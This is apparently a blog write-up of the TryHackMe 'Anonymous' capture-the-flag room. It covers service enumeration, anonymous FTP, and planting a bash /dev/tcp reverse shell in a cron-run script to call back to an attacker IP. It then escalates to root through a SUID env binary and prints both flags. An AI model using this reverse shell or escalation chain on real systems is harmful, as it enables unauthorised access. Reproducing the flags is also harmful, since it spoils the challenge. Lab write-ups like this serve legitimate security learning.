Anonymous – a tryhackme.com writeup

A quite minimalistic CTF from tryhackme.com – lets dive right in:

What does nmap say?

sudo nmap -sV 10.10.51.126

There we have  the first answers to the challenge: 4 Services are running, FTP on 21 and smb on 139 and 445.

Now we need to look at the smb shares:

smbclient -L10.10.51.126

Next answer: the share we are looking for is pics.

Now we are looking for the flags.

Let’s see what ftp can do for us.

ftp 10.10.51.126

Anonymous login works.

That looks good. 3 files, we can read all of them and write to the shell script. Lets download them and look into them.

get clean.sh
get removed_files.log
get to_do.txt

to_do.txt only tells us that the admin is planning to block anonymous access. Good idea but doesn*t help.

So let’s cat out removed_files.log

 cat removed_files.log

Not too interesting either. 

Let’s move on to the bash script.

cat clean.sh

Now things are beginning to make sense.

clean.sh writes into the removed_files.log. Knowing that there where a lot of lines in the log file we can assume that clean.sh is automatically and periodically called by a cron job.

We also know that we can write to the file. So let’s just plant a reverse shell into that script, setup netcat on our side and see if we get a shell when eventually on the target the cron job fires.

#!/bin/bash
exec 5<>/dev/tcp/10.11.30.88/1234
cat <&5 | while read line; do $line 2>&5 >&5; done

And in out ftp session:

put clean.sh clean.sh

On our local machine we start our usual netcat listener

nc -l 1234

and wait …

And here we go. Let’s look around.

whoami
pwd
ls -la

We found the user flag

90d6f992585815ff991e68748c414740

To get ideas on how to become root let’s use linpeas.

We start a webserver locally and upload the file to our target.

So on our local machine:

python3 -m http.server

And on the target machine:

wget http://10.11.30.88:8000/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh

In the SUID sections we find this line

-rwsr-xr-x 1 root root 35K Jan 18 2018 /usr/bin/env

With this we find something on

https://gtfobins.github.io/gtfobins/env/#suid

From there we use

env /bin/sh -p

and we are root.

whoami
root
cat /root/root.txt

So our root flag is

4d930091c31a622a7ed10f27999af363

Leave a Reply

Your email address will not be published. Required fields are marked *